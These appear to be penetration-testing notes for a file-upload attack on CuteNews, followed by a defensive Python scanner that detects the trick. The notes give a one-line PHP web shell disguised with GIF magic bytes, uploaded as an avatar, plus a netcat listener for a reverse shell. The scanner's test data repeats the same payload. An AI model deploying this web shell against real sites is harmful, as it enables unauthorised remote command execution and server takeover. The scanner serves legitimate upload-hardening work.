Cute News
[1] Navigate to the default page and register a new user
[2] Register a bogus e-mail, user and password
[3] If the captcha required for registration is malformed or does not show up, find it at the default page .../captcha.php
[4] Once logged in, click on personal options and find the “avatar” tab
[5] Craft a malicious PHP script, “evil.php”. Starting the file with a GIF magic byte sequence tricks the system into interpreting the ASCII file as a .gif
GIF8;
<?php system($_REQUEST['cmd']) ?>
[6] Upload the malicious file, then check the folder where it was uploaded
Default location
[7] Get command execution
[8] Revshell
(might need to URL encode)
Catch revshell: nc -nvlp 1234
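
Defender's view of steps [5] and [6], as an added example that is not part of the original notes or of CuteNews: a scanner that flags avatar uploads whose extension, full image signature or body give away the magic-byte trick. The allow-list, finding names and sample file names are assumptions made for the illustration.

```python
import os
import re
import tempfile

# Full signatures; the 4-byte prefix "GIF8" alone is not a valid GIF header.
STRICT_SIGS = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")
ALLOWED_EXT = {".gif", ".png", ".jpg", ".jpeg"}  # assumed avatar policy
PHP_TAG = re.compile(rb"<\?php", re.IGNORECASE)


def inspect_upload(name: str, data: bytes) -> list:
    """Return the reasons an uploaded avatar should be rejected or flagged."""
    findings = []
    if os.path.splitext(name)[1].lower() not in ALLOWED_EXT:
        findings.append("extension-not-allowed")
    if not data.startswith(STRICT_SIGS):
        findings.append("bad-image-signature")
    # A valid signature does not prove the rest is an image, so scan the body.
    if PHP_TAG.search(data):
        findings.append("embedded-php-tag")
    return findings


def scan_dir(root: str) -> dict:
    """Walk an upload directory and report only the files with findings."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(folder, fname)
            with open(path, "rb") as fh:
                findings = inspect_upload(fname, fh.read())
            if findings:
                report[os.path.relpath(path, root)] = findings
    return report


def demo() -> dict:
    """Constructed samples: the evil.php body from step [5] and a bare GIF header."""
    samples = {
        "avatar_evil.php": b"GIF8;\n<?php system($_REQUEST['cmd']) ?>",
        "avatar_ok.gif": b"GIF89a\x01\x00\x01\x00\x00\x00\x00;",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, data in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        return scan_dir(root)


if __name__ == "__main__":
    for path, findings in demo().items():
        print(path, findings)
```

The same three checks belong in the upload handler itself, together with serving the avatar folder with script execution disabled, so a file that slips through is never interpreted.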